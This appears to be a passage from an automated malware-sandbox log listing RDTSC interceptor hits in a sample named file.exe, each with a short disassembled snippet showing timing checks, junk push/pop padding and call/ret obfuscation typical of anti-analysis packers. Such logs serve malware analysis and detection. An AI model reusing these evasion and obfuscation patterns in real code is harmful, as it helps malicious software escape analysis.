Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D4012 second address: 8D401D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D401D second address: 8D4023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D44F7 second address: 8D44FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D44FF second address: 8D4503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D4624 second address: 8D4628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D4628 second address: 8D464C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8481503873h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F848150386Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D464C second address: 8D4656 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F8480743926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D4783 second address: 8D4787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D4787 second address: 8D478B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D4B7E second address: 8D4B83 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D4B83 second address: 8D4B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D4B89 second address: 8D4BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 jnl 00007F8481503866h 0x0000000f pop ebx 0x00000010 jmp 00007F8481503877h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F848150386Bh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D4CFD second address: 8D4D03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D4D03 second address: 8D4D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D4D09 second address: 8D4D13 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F848074392Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C8BCF second address: 8C8BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D5563 second address: 8D556E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D5B55 second address: 8D5B8A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8481503866h 0x00000008 jmp 00007F8481503873h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8481503874h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D5B8A second address: 8D5B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D5B8E second address: 8D5B92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DA115 second address: 8DA11A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DAF6F second address: 8DAF73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DC8E5 second address: 8DC8F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DC8F3 second address: 8DC8FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F8481503866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E1203 second address: 8E1207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E1207 second address: 8E1210 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E1210 second address: 8E121E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E121E second address: 8E1222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E1222 second address: 8E1228 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E1228 second address: 8E1247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8481503879h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E1247 second address: 8E1253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F8480743926h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E1968 second address: 8E1993 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8481503866h 0x00000008 jnc 00007F8481503866h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F8481503878h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E1993 second address: 8E1999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E1ADC second address: 8E1AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F848150386Bh 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E3D73 second address: 8E3D7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E3D7A second address: 8E3D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E3D87 second address: 8E3D9B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8480743926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E3D9B second address: 8E3DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E3DA2 second address: 8E3DC0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007F8480743926h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 jmp 00007F848074392Ch 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E42A2 second address: 8E42C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007F8481503873h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E4B9B second address: 8E4B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E4B9F second address: 8E4BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E4C86 second address: 8E4CA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jnl 00007F8480743926h 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E4CA4 second address: 8E4CA9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E561D second address: 8E563E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8480743935h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E80CC second address: 8E80D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E8705 second address: 8E8709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E91B2 second address: 8E91CC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8481503871h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E9C68 second address: 8E9C6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EA72D second address: 8EA731 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EBC6D second address: 8EBC77 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8480743926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8ED745 second address: 8ED74C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EC4CA second address: 8EC4CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8ED8BC second address: 8ED8CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F8481503866h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EE6A8 second address: 8EE6AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EF65C second address: 8EF660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EE7EB second address: 8EE800 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EF660 second address: 8EF669 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EF669 second address: 8EF66F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EF66F second address: 8EF6DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F8481503868h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 mov dword ptr [ebp+122D2A4Ch], eax 0x00000027 push 00000000h 0x00000029 or dword ptr [ebp+122D3560h], eax 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push edx 0x00000034 call 00007F8481503868h 0x00000039 pop edx 0x0000003a mov dword ptr [esp+04h], edx 0x0000003e add dword ptr [esp+04h], 00000015h 0x00000046 inc edx 0x00000047 push edx 0x00000048 ret 0x00000049 pop edx 0x0000004a ret 0x0000004b jmp 00007F848150386Ch 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jbe 00007F8481503868h 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EF6DD second address: 8EF6E2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EF862 second address: 8EF874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F848150386Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F07F7 second address: 8F07FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F1627 second address: 8F162D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F162D second address: 8F1631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F26BC second address: 8F26DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F848150386Dh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e jo 00007F8481503866h 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F26DC second address: 8F26E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F4808 second address: 8F480C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F6915 second address: 8F6919 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F6919 second address: 8F6923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F6923 second address: 8F6927 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F6927 second address: 8F692D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F692D second address: 8F6977 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743930h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c jmp 00007F8480743936h 0x00000011 jmp 00007F848074392Eh 0x00000016 pop edx 0x00000017 jmp 00007F848074392Eh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8AB066 second address: 8AB07B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F6FC5 second address: 8F7021 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007F8480743926h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F8480743936h 0x00000014 nop 0x00000015 mov edi, esi 0x00000017 push 00000000h 0x00000019 mov edi, dword ptr [ebp+122D1E69h] 0x0000001f jmp 00007F8480743937h 0x00000024 push 00000000h 0x00000026 mov edi, dword ptr [ebp+122D3630h] 0x0000002c xchg eax, esi 0x0000002d pushad 0x0000002e je 00007F8480743928h 0x00000034 push esi 0x00000035 pop esi 0x00000036 push esi 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F7021 second address: 8F702E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F8F2F second address: 8F8F4C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8480743926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F848074392Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FADA5 second address: 8FADA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FADA9 second address: 8FADB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F848074392Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FADB7 second address: 8FAE2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebp 0x00000009 call 00007F8481503868h 0x0000000e pop ebp 0x0000000f mov dword ptr [esp+04h], ebp 0x00000013 add dword ptr [esp+04h], 00000018h 0x0000001b inc ebp 0x0000001c push ebp 0x0000001d ret 0x0000001e pop ebp 0x0000001f ret 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edx 0x00000025 call 00007F8481503868h 0x0000002a pop edx 0x0000002b mov dword ptr [esp+04h], edx 0x0000002f add dword ptr [esp+04h], 0000001Ah 0x00000037 inc edx 0x00000038 push edx 0x00000039 ret 0x0000003a pop edx 0x0000003b ret 0x0000003c mov dword ptr [ebp+122D19FDh], ebx 0x00000042 push 00000000h 0x00000044 xor dword ptr [ebp+122D26B0h], ebx 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e pushad 0x0000004f popad 0x00000050 jmp 00007F8481503876h 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F815B second address: 8F81D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F848074392Fh 0x0000000a popad 0x0000000b push eax 0x0000000c jng 00007F848074392Ch 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F8480743928h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 push dword ptr fs:[00000000h] 0x0000003a adc ebx, 6B697BA1h 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 mov dword ptr [ebp+122D1EF2h], ebx 0x0000004d mov eax, dword ptr [ebp+122D156Dh] 0x00000053 mov edi, dword ptr [ebp+122D1BD2h] 0x00000059 push FFFFFFFFh 0x0000005b jmp 00007F848074392Dh 0x00000060 nop 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 push edx 0x00000065 pop edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FA004 second address: 8FA008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FAF86 second address: 8FAF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FAF8B second address: 8FAF90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FCD7C second address: 8FCD85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FCD85 second address: 8FCD89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FCD89 second address: 8FCE12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F8480743928h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov ebx, edx 0x00000029 push 00000000h 0x0000002b mov edi, eax 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ecx 0x00000032 call 00007F8480743928h 0x00000037 pop ecx 0x00000038 mov dword ptr [esp+04h], ecx 0x0000003c add dword ptr [esp+04h], 00000016h 0x00000044 inc ecx 0x00000045 push ecx 0x00000046 ret 0x00000047 pop ecx 0x00000048 ret 0x00000049 sub ebx, dword ptr [ebp+122D382Ch] 0x0000004f jg 00007F848074392Dh 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F848074392Ah 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FAF90 second address: 8FB029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F848150386Ah 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e jmp 00007F848150386Eh 0x00000013 pop eax 0x00000014 nop 0x00000015 mov dword ptr [ebp+122D1EE1h], ebx 0x0000001b push dword ptr fs:[00000000h] 0x00000022 mov dword ptr [ebp+12466B3Eh], eax 0x00000028 mov dword ptr fs:[00000000h], esp 0x0000002f push 00000000h 0x00000031 push edx 0x00000032 call 00007F8481503868h 0x00000037 pop edx 0x00000038 mov dword ptr [esp+04h], edx 0x0000003c add dword ptr [esp+04h], 00000017h 0x00000044 inc edx 0x00000045 push edx 0x00000046 ret 0x00000047 pop edx 0x00000048 ret 0x00000049 sbb bx, 36FEh 0x0000004e mov eax, dword ptr [ebp+122D0199h] 0x00000054 push 00000000h 0x00000056 push ecx 0x00000057 call 00007F8481503868h 0x0000005c pop ecx 0x0000005d mov dword ptr [esp+04h], ecx 0x00000061 add dword ptr [esp+04h], 0000001Bh 0x00000069 inc ecx 0x0000006a push ecx 0x0000006b ret 0x0000006c pop ecx 0x0000006d ret 0x0000006e push FFFFFFFFh 